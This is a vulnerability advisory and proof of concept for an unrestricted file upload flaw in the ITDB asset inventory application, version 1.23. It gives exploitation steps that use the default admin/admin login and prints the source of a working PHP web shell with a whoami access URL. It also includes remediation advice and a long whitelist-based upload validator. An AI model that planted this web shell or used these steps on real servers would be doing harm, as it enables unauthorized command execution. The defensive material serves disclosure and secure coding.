PoC - ITDB Unrestricted File Upload
# Exploit Title: Unrestricted File Upload Vulnerability in ITDB (IT Items DataBase) Application
# Date: Sept 07th, 2017
# Exploit Author: @rungga_reksya
# Vendor Homepage: http://www.sivann.gr/software/itdb/
# Software Link: https://github.com/sivann/itdb/archive/master.zip
# Version: 1.23
# Tested on: Windows Server 2008 R2
# CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H (7.5 - HIGH)
I. Application Background:
ITDB is a web-based asset inventory management tool used to store information about assets found in office
environments, with a focus on -but not limited to- IT assets. It does not target ITIL/CMDB compliance (yet), but
it has served me for years and hopefully it will do the same for you :-)
ITDB comes with sources and is distributed under the GNU Public License.
II. Vulnerability Description:
An unrestricted file upload vulnerability in the "Add File" menu of ITDB version 1.23 allows an authenticated user
whose account type is "Full Access" or "Read" to upload malicious code (a web shell) with a ".php" extension.
III. Exploit:
The file "00-INSTALL.txt" lists the default username and password as "admin/admin". Suppose the attacker has
obtained admin privileges and logs in to the ITDB application as admin. The attacker then opens the "Add File" menu,
uploads the shell (shellcmd.php) via "Upload a File", and clicks Save —> Bingo, success.
Directory listing at "http://target.com/itdb-directory/data/files/"
Check the "Filename" field for your shell and access it like this:
http://target.com/[itdb-directory]/data/files/yourshell.php?cmd=whoami
Script for shellcmd.php:
======
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
======
IV. Remediation:
Restrict the file types accepted for upload: check the file extension and only allow specific types to be uploaded,
using a whitelist rather than a blacklist. Check for double extensions such as .php.png. Check for files with no
base name such as .htaccess (on ASP.NET, also check for configuration files like web.config). Change the permissions
on the upload folder so that the files within it are not executable. If possible, rename uploaded files on storage.
(source: https://www.acunetix.com/vulnerabilities/web/unrestricted-file-upload)
Content-type verification: this kind of check relies entirely on the Content-Type header (e.g. Content-Type:
image/jpeg) that carries the MIME type. It is a very weak validation mechanism, because the header is supplied by
the user or attacker and can be set to anything.
(source: https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
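The checks listed above, combined into one upload validator. This is an added example written for this advisory, not
code from ITDB; the allowed-type lists, the form field name "userfile" and the target directory are assumptions, and
the function ignores the client-supplied name and Content-Type entirely, sniffing the temporary file with finfo
instead.

```php
<?php
// Added example (not ITDB's code): whitelist-based upload validation.

// Assumed whitelist of extensions this application needs to accept.
const ALLOWED_EXTENSIONS = ['png', 'jpg', 'jpeg', 'gif', 'pdf', 'txt'];

// MIME types finfo is expected to report for each allowed extension.
const ALLOWED_MIME = [
    'png'  => ['image/png'],
    'jpg'  => ['image/jpeg'],
    'jpeg' => ['image/jpeg'],
    'gif'  => ['image/gif'],
    'pdf'  => ['application/pdf'],
    'txt'  => ['text/plain'],
];

/**
 * Validate one $_FILES entry and store it under a random name.
 * Returns [true, $storedName] on success or [false, $reason] on rejection.
 */
function validate_upload(array $file, string $uploadDir): array
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return [false, 'upload error'];
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        return [false, 'not an uploaded file'];
    }

    // Keep only the base name; drop any directory components the client sent.
    $original = basename((string)$file['name']);

    // Reject dot-prefixed names (".htaccess") and names without an extension.
    if ($original === '' || $original[0] === '.' || strpos($original, '.') === false) {
        return [false, 'missing or dot-prefixed filename'];
    }

    // Whitelist every suffix, not just the last one: "shell.php.png" is
    // rejected because "php" is not on the list. This is deliberately strict.
    $parts = explode('.', $original);
    array_shift($parts); // discard the base name
    foreach ($parts as $suffix) {
        if (!in_array(strtolower($suffix), ALLOWED_EXTENSIONS, true)) {
            return [false, 'extension not allowed: ' . $suffix];
        }
    }
    $ext = strtolower(end($parts));

    // Do not trust $file['type'] (the client's Content-Type header); sniff the
    // temporary file's actual content and require it to match the extension.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED_MIME[$ext], true)) {
        return [false, 'content does not match extension: ' . $mime];
    }

    // Rename on storage: random name plus whitelisted extension, so no
    // attacker-chosen string ever reaches the filesystem path.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest   = rtrim($uploadDir, '/') . '/' . $stored;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return [false, 'could not store file'];
    }
    chmod($dest, 0644); // readable, never executable
    return [true, $stored];
}

// Usage in the upload handler (assumed field name and directory):
// [$ok, $result] = validate_upload($_FILES['userfile'], __DIR__ . '/data/files');
// if (!$ok) { http_response_code(400); exit($result); }
```

Because the stored name is random and the extension is always from the whitelist, the original filename (and any
double extension in it) never influences where or how the file is served; the strict per-suffix check is a second
line of defence. Application-side validation should still be paired with a web-server rule that disables script
execution in data/files, since a later code change could reintroduce an unchecked path.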
V. Proof of Concept:
Admin Privilege (Full Access)
Low User (Read Only)